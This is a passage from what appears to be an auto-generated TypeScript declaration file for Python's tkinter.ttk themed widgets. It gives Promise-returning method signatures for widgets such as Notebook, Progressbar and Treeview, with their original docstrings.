settings?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Temporarily sets the current theme to themename, apply specified\n\t\t\t * settings and then restore the previous theme.\n\t\t\t * \n\t\t\t * Each key in settings is a style and each value may contain the\n\t\t\t * keys 'configure', 'map', 'layout' and 'element create' and they\n\t\t\t * are expected to have the same format as specified by the methods\n\t\t\t * configure, map, layout and element_create respectively.\n\t\t\t */\n\t\t\ttheme_settings(themename, settings): Promise<any>\n\t\t\ttheme_settings$({ themename, settings }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a list of all known themes.\n\t\t\t */\n\t\t\ttheme_names(): Promise<any>\n\t\t\ttheme_names$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If themename is None, returns the theme in use, otherwise, set\n\t\t\t * the current theme to themename, refreshes all widgets and emits\n\t\t\t * a <<ThemeChanged>> event.\n\t\t\t */\n\t\t\ttheme_use(themename?): Promise<any>\n\t\t\ttheme_use$({ themename }: { themename?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Base class for Tk themed widgets.\n\t\t */\n\n\t\t/**\n\t\t * Constructs a Ttk Widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, takefocus, style\n\t\t * \n\t\t * SCROLLABLE WIDGET OPTIONS\n\t\t * \n\t\t * xscrollcommand, yscrollcommand\n\t\t * \n\t\t * LABEL WIDGET OPTIONS\n\t\t * \n\t\t * text, textvariable, underline, image, compound, width\n\t\t * \n\t\t * WIDGET STATES\n\t\t * \n\t\t * active, disabled, focus, pressed, selected, background,\n\t\t * readonly, alternate, invalid\n\t\t * \n\t\t */\n\t\tfunction Widget(master, widgetname, kw?): Promise<IWidget>\n\t\tfunction Widget$({ master, widgetname, kw }: { master, widgetname, kw?}): Promise<IWidget>\n\t\tinterface IWidget {\n\n\t\t\t/**\n\t\t\t * Returns the name of the element at position x, y, or the empty\n\t\t\t * string if the point does not lie within any element.\n\t\t\t * \n\t\t\t * x and y are pixel coordinates relative to the widget.\n\t\t\t */\n\t\t\tidentify(x, y): Promise<any>\n\t\t\tidentify$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Test the widget's state.\n\t\t\t * \n\t\t\t * If callback is not specified, returns True if the widget state\n\t\t\t * matches statespec and False otherwise. If callback is specified,\n\t\t\t * then it will be invoked with *args, **kw if the widget state\n\t\t\t * matches statespec. statespec is expected to be a sequence.\n\t\t\t */\n\t\t\tinstate(statespec, callback?): Promise<any>\n\t\t\tinstate$({ statespec, callback }: { statespec, callback?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Modify or inquire widget state.\n\t\t\t * \n\t\t\t * Widget state is returned if statespec is None, otherwise it is\n\t\t\t * set according to the statespec flags and then a new state spec\n\t\t\t * is returned indicating which flags were changed. statespec is\n\t\t\t * expected to be a sequence.\n\t\t\t */\n\t\t\tstate(statespec?): Promise<any>\n\t\t\tstate$({ statespec }: { statespec?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Button widget, displays a textual label and/or image, and\n\t\t * evaluates a command when pressed.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Button widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, default, width\n\t\t * \n\t\t */\n\t\tfunction Button(master?): Promise<IButton>\n\t\tfunction Button$({ master }: { master?}): Promise<IButton>\n\t\tinterface IButton extends IWidget {\n\n\t\t\t/**\n\t\t\t * Invokes the command associated with the button.\n\t\t\t */\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Checkbutton widget which is either in on- or off-state.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Checkbutton widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, offvalue, onvalue, variable\n\t\t * \n\t\t */\n\t\tfunction Checkbutton(master?): Promise<ICheckbutton>\n\t\tfunction Checkbutton$({ master }: { master?}): Promise<ICheckbutton>\n\t\tinterface ICheckbutton extends IWidget {\n\n\t\t\t/**\n\t\t\t * Toggles between the selected and deselected states and\n\t\t\t * invokes the associated command. If the widget is currently\n\t\t\t * selected, sets the option variable to the offvalue option\n\t\t\t * and deselects the widget; otherwise, sets the option variable\n\t\t\t * to the option onvalue.\n\t\t\t * \n\t\t\t * Returns the result of the associated command.\n\t\t\t */\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Entry widget displays a one-line text string and allows that\n\t\t * string to be edited by the user.\n\t\t */\n\n\t\t/**\n\t\t * Constructs a Ttk Entry widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus, xscrollcommand\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * exportselection, invalidcommand, justify, show, state,\n\t\t * textvariable, validate, validatecommand, width\n\t\t * \n\t\t * VALIDATION MODES\n\t\t * \n\t\t * none, key, focus, focusin, focusout, all\n\t\t * \n\t\t */\n\t\tfunction Entry(master?, widget?): Promise<IEntry>\n\t\tfunction Entry$({ master, widget }: { master?, widget?}): Promise<IEntry>\n\t\tinterface IEntry extends IWidget {\n\n\t\t\t/**\n\t\t\t * Return a tuple of (x, y, width, height) which describes the\n\t\t\t * bounding box of the character given by index.\n\t\t\t */\n\t\t\tbbox(index): Promise<any>\n\t\t\tbbox$({ index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the name of the element at position x, y, or the\n\t\t\t * empty string if the coordinates are outside the window.\n\t\t\t */\n\t\t\tidentify(x, y): Promise<any>\n\t\t\tidentify$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Force revalidation, independent of the conditions specified\n\t\t\t * by the validate option. Returns False if validation fails, True\n\t\t\t * if it succeeds. Sets or clears the invalid state accordingly.\n\t\t\t */\n\t\t\tvalidate(): Promise<any>\n\t\t\tvalidate$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Combobox widget combines a text field with a pop-down list of\n\t\t * values.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Combobox widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * exportselection, justify, height, postcommand, state,\n\t\t * textvariable, values, width\n\t\t * \n\t\t */\n\t\tfunction Combobox(master?): Promise<ICombobox>\n\t\tfunction Combobox$({ master }: { master?}): Promise<ICombobox>\n\t\tinterface ICombobox extends IEntry {\n\n\t\t\t/**\n\t\t\t * If newindex is supplied, sets the combobox value to the\n\t\t\t * element at position newindex in the list of values. Otherwise,\n\t\t\t * returns the index of the current value in the list of values\n\t\t\t * or -1 if the current value does not appear in the list.\n\t\t\t */\n\t\t\tcurrent(newindex?): Promise<any>\n\t\t\tcurrent$({ newindex }: { newindex?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Sets the value of the combobox to value.\n\t\t\t */\n\t\t\tset(value): Promise<any>\n\t\t\tset$({ value }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Frame widget is a container, used to group other widgets\n\t\t * together.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Frame with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * borderwidth, relief, padding, width, height\n\t\t * \n\t\t */\n\t\tfunction Frame(master?): Promise<IFrame>\n\t\tfunction Frame$({ master }: { master?}): Promise<IFrame>\n\t\tinterface IFrame extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Label widget displays a textual label and/or image.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Label with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, style, takefocus, text,\n\t\t * textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * anchor, background, font, foreground, justify, padding,\n\t\t * relief, text, wraplength\n\t\t * \n\t\t */\n\t\tfunction Label(master?): Promise<ILabel>\n\t\tfunction Label$({ master }: { master?}): Promise<ILabel>\n\t\tinterface ILabel extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Labelframe widget is a container used to group other widgets\n\t\t * together. It has an optional label, which may be a plain text string\n\t\t * or another widget.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Labelframe with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * labelanchor, text, underline, padding, labelwidget, width,\n\t\t * height\n\t\t * \n\t\t */\n\t\tfunction Labelframe(master?): Promise<ILabelframe>\n\t\tfunction Labelframe$({ master }: { master?}): Promise<ILabelframe>\n\t\tinterface ILabelframe extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Menubutton widget displays a textual label and/or image, and\n\t\t * displays a menu when pressed.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Menubutton with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * direction, menu\n\t\t * \n\t\t */\n\t\tfunction Menubutton(master?): Promise<IMenubutton>\n\t\tfunction Menubutton$({ master }: { master?}): Promise<IMenubutton>\n\t\tinterface IMenubutton extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Notebook widget manages a collection of windows and displays\n\t\t * a single one at a time. Each child window is associated with a tab,\n\t\t * which the user may select to change the currently-displayed window.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Notebook with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * height, padding, width\n\t\t * \n\t\t * TAB OPTIONS\n\t\t * \n\t\t * state, sticky, padding, text, image, compound, underline\n\t\t * \n\t\t * TAB IDENTIFIERS (tab_id)\n\t\t * \n\t\t * The tab_id argument found in several methods may take any of\n\t\t * the following forms:\n\t\t * \n\t\t * * An integer between zero and the number of tabs\n\t\t * * The name of a child window\n\t\t * * A positional specification of the form \"@x,y\", which\n\t\t * defines the tab\n\t\t * * The string \"current\", which identifies the\n\t\t * currently-selected tab\n\t\t * * The string \"end\", which returns the number of tabs (only\n\t\t * valid for method index)\n\t\t * \n\t\t */\n\t\tfunction Notebook(master?): Promise<INotebook>\n\t\tfunction Notebook$({ master }: { master?}): Promise<INotebook>\n\t\tinterface INotebook extends IWidget {\n\n\t\t\t/**\n\t\t\t * Adds a new tab to the notebook.\n\t\t\t * \n\t\t\t * If window is currently managed by the notebook but hidden, it is\n\t\t\t * restored to its previous position.\n\t\t\t */\n\t\t\tadd(child): Promise<any>\n\t\t\tadd$({ child }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Removes the tab specified by tab_id, unmaps and unmanages the\n\t\t\t * associated window.\n\t\t\t */\n\t\t\tforget(tab_id): Promise<any>\n\t\t\tforget$({ tab_id }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Hides the tab specified by tab_id.\n\t\t\t * \n\t\t\t * The tab will not be displayed, but the associated window remains\n\t\t\t * managed by the notebook and its configuration remembered. Hidden\n\t\t\t * tabs may be restored with the add command.\n\t\t\t */\n\t\t\thide(tab_id): Promise<any>\n\t\t\thide$({ tab_id }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the name of the tab element at position x, y, or the\n\t\t\t * empty string if none.\n\t\t\t */\n\t\t\tidentify(x, y): Promise<any>\n\t\t\tidentify$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the numeric index of the tab specified by tab_id, or\n\t\t\t * the total number of tabs if tab_id is the string \"end\".\n\t\t\t */\n\t\t\tindex(tab_id): Promise<any>\n\t\t\tindex$({ tab_id }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Inserts a pane at the specified position.\n\t\t\t * \n\t\t\t * pos is either the string end, an integer index, or the name of\n\t\t\t * a managed child. If child is already managed by the notebook,\n\t\t\t * moves it to the specified position.\n\t\t\t */\n\t\t\tinsert(pos, child): Promise<any>\n\t\t\tinsert$({ pos, child }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Selects the specified tab.\n\t\t\t * \n\t\t\t * The associated child window will be displayed, and the\n\t\t\t * previously-selected window (if different) is unmapped. If tab_id\n\t\t\t * is omitted, returns the widget name of the currently selected\n\t\t\t * pane.\n\t\t\t */\n\t\t\tselect(tab_id?): Promise<any>\n\t\t\tselect$({ tab_id }: { tab_id?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options of the specific tab_id.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the tab option values. If option\n\t\t\t * is specified, returns the value of that option. Otherwise, sets the\n\t\t\t * options to the corresponding values.\n\t\t\t */\n\t\t\ttab(tab_id, option?): Promise<any>\n\t\t\ttab$({ tab_id, option }: { tab_id, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a list of windows managed by the notebook.\n\t\t\t */\n\t\t\ttabs(): Promise<any>\n\t\t\ttabs$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Enable keyboard traversal for a toplevel window containing\n\t\t\t * this notebook.\n\t\t\t * \n\t\t\t * This will extend the bindings for the toplevel window containing\n\t\t\t * this notebook as follows:\n\t\t\t * \n\t\t\t * Control-Tab: selects the tab following the currently selected\n\t\t\t * one\n\t\t\t * \n\t\t\t * Shift-Control-Tab: selects the tab preceding the currently\n\t\t\t * selected one\n\t\t\t * \n\t\t\t * Alt-K: where K is the mnemonic (underlined) character of any\n\t\t\t * tab, will select that tab.\n\t\t\t * \n\t\t\t * Multiple notebooks in a single toplevel may be enabled for\n\t\t\t * traversal, including nested notebooks. However, notebook traversal\n\t\t\t * only works properly if all panes are direct children of the\n\t\t\t * notebook.\n\t\t\t */\n\t\t\tenable_traversal(): Promise<any>\n\t\t\tenable_traversal$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Panedwindow widget displays a number of subwindows, stacked\n\t\t * either vertically or horizontally.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Panedwindow with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * orient, width, height\n\t\t * \n\t\t * PANE OPTIONS\n\t\t * \n\t\t * weight\n\t\t * \n\t\t */\n\t\tfunction Panedwindow(master?): Promise<IPanedwindow>\n\t\tfunction Panedwindow$({ master }: { master?}): Promise<IPanedwindow>\n\t\tinterface IPanedwindow extends IWidget {\n\n\t\t\t/**\n\t\t\t * Inserts a pane at the specified positions.\n\t\t\t * \n\t\t\t * pos is either the string end, and integer index, or the name\n\t\t\t * of a child. If child is already managed by the paned window,\n\t\t\t * moves it to the specified position.\n\t\t\t */\n\t\t\tinsert(pos, child): Promise<any>\n\t\t\tinsert$({ pos, child }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options of the specified pane.\n\t\t\t * \n\t\t\t * pane is either an integer index or the name of a managed subwindow.\n\t\t\t * If kw is not given, returns a dict of the pane option values. If\n\t\t\t * option is specified then the value for that option is returned.\n\t\t\t * Otherwise, sets the options to the corresponding values.\n\t\t\t */\n\t\t\tpane(pane, option?): Promise<any>\n\t\t\tpane$({ pane, option }: { pane, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If newpos is specified, sets the position of sash number index.\n\t\t\t * \n\t\t\t * May adjust the positions of adjacent sashes to ensure that\n\t\t\t * positions are monotonically increasing. Sash positions are further\n\t\t\t * constrained to be between 0 and the total size of the widget.\n\t\t\t * \n\t\t\t * Returns the new position of sash number index.\n\t\t\t */\n\t\t\tsashpos(index, newpos?): Promise<any>\n\t\t\tsashpos$({ index, newpos }: { index, newpos?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Progressbar widget shows the status of a long-running\n\t\t * operation. They can operate in two modes: determinate mode shows the\n\t\t * amount completed relative to the total amount of work to be done, and\n\t\t * indeterminate mode provides an animated display to let the user know\n\t\t * that something is happening.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Progressbar with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * orient, length, mode, maximum, value, variable, phase\n\t\t * \n\t\t */\n\t\tfunction Progressbar(master?): Promise<IProgressbar>\n\t\tfunction Progressbar$({ master }: { master?}): Promise<IProgressbar>\n\t\tinterface IProgressbar extends IWidget {\n\n\t\t\t/**\n\t\t\t * Begin autoincrement mode: schedules a recurring timer event\n\t\t\t * that calls method step every interval milliseconds.\n\t\t\t * \n\t\t\t * interval defaults to 50 milliseconds (20 steps/second) if omitted.\n\t\t\t */\n\t\t\tstart(interval?): Promise<any>\n\t\t\tstart$({ interval }: { interval?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Increments the value option by amount.\n\t\t\t * \n\t\t\t * amount defaults to 1.0 if omitted.\n\t\t\t */\n\t\t\tstep(amount?): Promise<any>\n\t\t\tstep$({ amount }: { amount?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Stop autoincrement mode: cancels any recurring timer event\n\t\t\t * initiated by start.\n\t\t\t */\n\t\t\tstop(): Promise<any>\n\t\t\tstop$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Radiobutton widgets are used in groups to show or change a\n\t\t * set of mutually-exclusive options.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Radiobutton with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, value, variable\n\t\t * \n\t\t */\n\t\tfunction Radiobutton(master?): Promise<IRadiobutton>\n\t\tfunction Radiobutton$({ master }: { master?}): Promise<IRadiobutton>\n\t\tinterface IRadiobutton extends IWidget {\n\n\t\t\t/**\n\t\t\t * Sets the option variable to the option value, selects the\n\t\t\t * widget, and invokes the associated command.\n\t\t\t * \n\t\t\t * Returns the result of the command, or an empty string if\n\t\t\t * no command is specified.\n\t\t\t */\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Scale widget is typically used to control the numeric value of\n\t\t * a linked variable that varies uniformly over some range.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Scale with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, from, length, orient, to, value, variable\n\t\t * \n\t\t */\n\t\tfunction Scale(master?): Promise<IScale>\n\t\tfunction Scale$({ master }: { master?}): Promise<IScale>\n\t\tinterface IScale extends IWidget {\n\n\t\t\t/**\n\t\t\t * Modify or query scale options.\n\t\t\t * \n\t\t\t * Setting a value for any of the \"from\", \"from_\" or \"to\" options\n\t\t\t * generates a <<RangeChanged>> event.\n\t\t\t */\n\t\t\tconfigure(cnf?): Promise<any>\n\t\t\tconfigure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get the current value of the value option, or the value\n\t\t\t * corresponding to the coordinates x, y if they are specified.\n\t\t\t * \n\t\t\t * x and y are pixel coordinates relative to the scale widget\n\t\t\t * origin.\n\t\t\t */\n\t\t\tget(x?, y?): Promise<any>\n\t\t\tget$({ x, y }: { x?, y?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Scrollbar controls the viewport of a scrollable widget.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Scrollbar with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, orient\n\t\t * \n\t\t */\n\t\tfunction Scrollbar(master?): Promise<IScrollbar>\n\t\tfunction Scrollbar$({ master }: { master?}): Promise<IScrollbar>\n\t\tinterface IScrollbar extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Separator widget displays a horizontal or vertical separator\n\t\t * bar.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Separator with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * orient\n\t\t * \n\t\t */\n\t\tfunction Separator(master?): Promise<ISeparator>\n\t\tfunction Separator$({ master }: { master?}): Promise<ISeparator>\n\t\tinterface ISeparator extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Sizegrip allows the user to resize the containing toplevel\n\t\t * window by pressing and dragging the grip.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Sizegrip with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, state, style, takefocus\n\t\t * \n\t\t */\n\t\tfunction Sizegrip(master?): Promise<ISizegrip>\n\t\tfunction Sizegrip$({ master }: { master?}): Promise<ISizegrip>\n\t\tinterface ISizegrip extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Spinbox is an Entry with increment and decrement arrows\n\t\t * \n\t\t * It is commonly used for number entry or to select from a list of\n\t\t * string values.\n\t\t * \n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Spinbox widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus, validate,\n\t\t * validatecommand, xscrollcommand, invalidcommand\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * to, from_, increment, values, wrap, format, command\n\t\t * \n\t\t */\n\t\tfunction Spinbox(master?): Promise<ISpinbox>\n\t\tfunction Spinbox$({ master }: { master?}): Promise<ISpinbox>\n\t\tinterface ISpinbox extends IEntry {\n\n\t\t\t/**\n\t\t\t * Sets the value of the Spinbox to value.\n\t\t\t */\n\t\t\tset(value): Promise<any>\n\t\t\tset$({ value }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Treeview widget displays a hierarchical collection of items.\n\t\t * \n\t\t * Each item has a textual label, an optional image, and an optional list\n\t\t * of data values. The data values are displayed in successive columns\n\t\t * after the tree label.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Treeview with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus, xscrollcommand,\n\t\t * yscrollcommand\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * columns, displaycolumns, height, padding, selectmode, show\n\t\t * \n\t\t * ITEM OPTIONS\n\t\t * \n\t\t * text, image, values, open, tags\n\t\t * \n\t\t * TAG OPTIONS\n\t\t * \n\t\t * foreground, background, font, image\n\t\t * \n\t\t */\n\t\tfunction Treeview(master?): Promise<ITreeview>\n\t\tfunction Treeview$({ master }: { master?}): Promise<ITreeview>\n\t\tinterface ITreeview extends IWidget {\n\n\t\t\t/**\n\t\t\t * Returns the bounding box (relative to the treeview widget's\n\t\t\t * window) of the specified item in the form x y width height.\n\t\t\t * \n\t\t\t * If column is specified, returns the bounding box of that cell.\n\t\t\t * If the item is not visible (i.e., if it is a descendant of a\n\t\t\t * closed item or is scrolled offscreen), returns an empty string.\n\t\t\t */\n\t\t\tbbox(item, column?): Promise<any>\n\t\t\tbbox$({ item, column }: { item, column?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a tuple of children belonging to item.\n\t\t\t * \n\t\t\t * If item is not specified, returns root children.\n\t\t\t */\n\t\t\tget_children(item?): Promise<any>\n\t\t\tget_children$({ item }: { item?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Replaces item's child with newchildren.\n\t\t\t * \n\t\t\t * Children present in item that are not present in newchildren\n\t\t\t * are detached from tree. No items in newchildren may be an\n\t\t\t * ancestor of item.\n\t\t\t */\n\t\t\tset_children(item): Promise<any>\n\t\t\tset_children$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options for the specified column.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the column option values. If\n\t\t\t * option is specified then the value for that option is returned.\n\t\t\t * Otherwise, sets the options to the corresponding values.\n\t\t\t */\n\t\t\tcolumn(column, option?): Promise<any>\n\t\t\tcolumn$({ column, option }: { column, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Delete all specified items and all their descendants. The root\n\t\t\t * item may not be deleted.\n\t\t\t */\n\t\t\tdelete(): Promise<any>\n\t\t\tdelete$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Unlinks all of the specified items from the tree.\n\t\t\t * \n\t\t\t * The items and all of their descendants are still present, and may\n\t\t\t * be reinserted at another point in the tree, but will not be\n\t\t\t * displayed. The root item may not be detached.\n\t\t\t */\n\t\t\tdetach(): Promise<any>\n\t\t\tdetach$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns True if the specified item is present in the tree,\n\t\t\t * False otherwise.\n\t\t\t */\n\t\t\texists(item): Promise<any>\n\t\t\texists$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * If item is specified, sets the focus item to item. Otherwise,\n\t\t\t * returns the current focus item, or '' if there is none.\n\t\t\t */\n\t\t\tfocus(item?): Promise<any>\n\t\t\tfocus$({ item }: { item?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the heading options for the specified column.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the heading option values. If\n\t\t\t * option is specified then the value for that option is returned.\n\t\t\t * Otherwise, sets the options to the corresponding values.\n\t\t\t * \n\t\t\t * Valid options/values are:\n\t\t\t * text: text\n\t\t\t * The text to display in the column heading\n\t\t\t * image: image_name\n\t\t\t * Specifies an image to display to the right of the column\n\t\t\t * heading\n\t\t\t * anchor: anchor\n\t\t\t * Specifies how the heading text should be aligned. One of\n\t\t\t * the standard Tk anchor values\n\t\t\t * command: callback\n\t\t\t * A callback to be invoked when the heading label is\n\t\t\t * pressed.\n\t\t\t * \n\t\t\t * To configure the tree column heading, call this with column = \"#0\" \n\t\t\t */\n\t\t\theading(column, option?): Promise<any>\n\t\t\theading$({ column, option }: { column, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a description of the specified component under the\n\t\t\t * point given by x and y, or the empty string if no such component\n\t\t\t * is present at that position.\n\t\t\t */\n\t\t\tidentify(component, x, y): Promise<any>\n\t\t\tidentify$({ component, x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the item ID of the item at position y.\n\t\t\t */\n\t\t\tidentify_row(y): Promise<any>\n\t\t\tidentify_row$({ y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the data column identifier of the cell at position x.\n\t\t\t * \n\t\t\t * The tree column has ID #0.\n\t\t\t */\n\t\t\tidentify_column(x): Promise<any>\n\t\t\tidentify_column$({ x }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns one of:\n\t\t\t * \n\t\t\t * heading: Tree heading area.\n\t\t\t * separator: Space between two columns headings;\n\t\t\t * tree: The tree area.\n\t\t\t * cell: A data cell.\n\t\t\t * \n\t\t\t * * Availability: Tk 8.6\n\t\t\t */\n\t\t\tidentify_region(x, y): Promise<any>\n\t\t\tidentify_region$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the element at position x, y.\n\t\t\t * \n\t\t\t * * Availability: Tk 8.6\n\t\t\t */\n\t\t\tidentify_element(x, y): Promise<any>\n\t\t\tidentify_element$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the integer index of item within its parent's list\n\t\t\t * of children.\n\t\t\t */\n\t\t\tindex(item): Promise<any>\n\t\t\tindex$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Creates a new item and return the item identifier of the newly\n\t\t\t * created item.\n\t\t\t * \n\t\t\t * parent is the item ID of the parent item, or the empty string\n\t\t\t * to create a new top-level item. index is an integer, or the value\n\t\t\t * end, specifying where in the list of parent's children to insert\n\t\t\t * the new item. If index is less than or equal to zero, the new node\n\t\t\t * is inserted at the beginning, if index is greater than or equal to\n\t\t\t * the current number of children, it is inserted at the end. If iid\n\t\t\t * is specified, it is used as the item identifier, iid must not\n\t\t\t * already exist in the tree. Otherwise, a new unique identifier\n\t\t\t * is generated.\n\t\t\t */\n\t\t\tinsert(parent, index, iid?): Promise<any>\n\t\t\tinsert$({ parent, index, iid }: { parent, index, iid?}): 